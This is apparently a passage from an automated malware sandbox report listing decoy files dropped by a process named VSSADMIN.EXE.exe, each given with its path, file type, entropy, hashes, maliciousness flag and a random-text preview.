                                                                                                                                                                    SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ ? ? ? ?\Common Files\Desktop\UMMBDNEQBN.png

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                    Entropy (8bit):4.695685570184741
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                    MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                    SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                    SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                    SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ ? ? ? ?\Common Files\Desktop\UMMBDNEQBN.xlsx

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                    Entropy (8bit):4.695685570184741
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                    MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                    SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                    SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                    SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ ? ? ? ?\Common Files\Desktop\VLZDGUKUTZ.jpg

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                    Entropy (8bit):4.701757898321461
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                                                                    MD5:520219000D5681B63804A2D138617B27
                                                                                                                                                                    SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                                                                    SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                                                    SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ ? ? ? ?\Common Files\Desktop\WUTJSCBCFX.png

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                    Entropy (8bit):4.688284131239007
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                                                                                                                                    MD5:E8ACCA0F46CBA97FE289855535184C72
                                                                                                                                                                    SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                                                                                                                                    SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                                                                                                                                    SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ ? ? ? ?\Common Files\Desktop\XZXHAVGRAG.xlsx

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                    Entropy (8bit):4.69156792375111
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                                                                                                    MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                                                                                                    SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                                                                                                    SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                                                                                                    SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ ? ? ? ?\Common Files\Documents\DTBZGIOOSO.docx

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                    Entropy (8bit):4.705615236042988
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
                                                                                                                                                                    MD5:159C7BA9D193731A3AAE589183A63B3F
                                                                                                                                                                    SHA1:81FDFC9C96C5B4F9C7730127B166B778092F114A
                                                                                                                                                                    SHA-256:1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
                                                                                                                                                                    SHA-512:2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ ? ? ? ?\Common Files\Documents\HTAGVDFUIE.pdf

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                    Entropy (8bit):4.692693183518806
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                                    MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                                    SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                                    SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                                    SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ ? ? ? ?\Common Files\Documents\KATAXZVCPS.mp3

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                    Entropy (8bit):4.699548026888946
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                                    MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                                    SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                                    SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                                    SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ ? ? ? ?\Common Files\Documents\KZWFNRXYKI.mp3

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                    Entropy (8bit):4.694982189683734
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                                    MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                                    SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                                    SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                                    SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
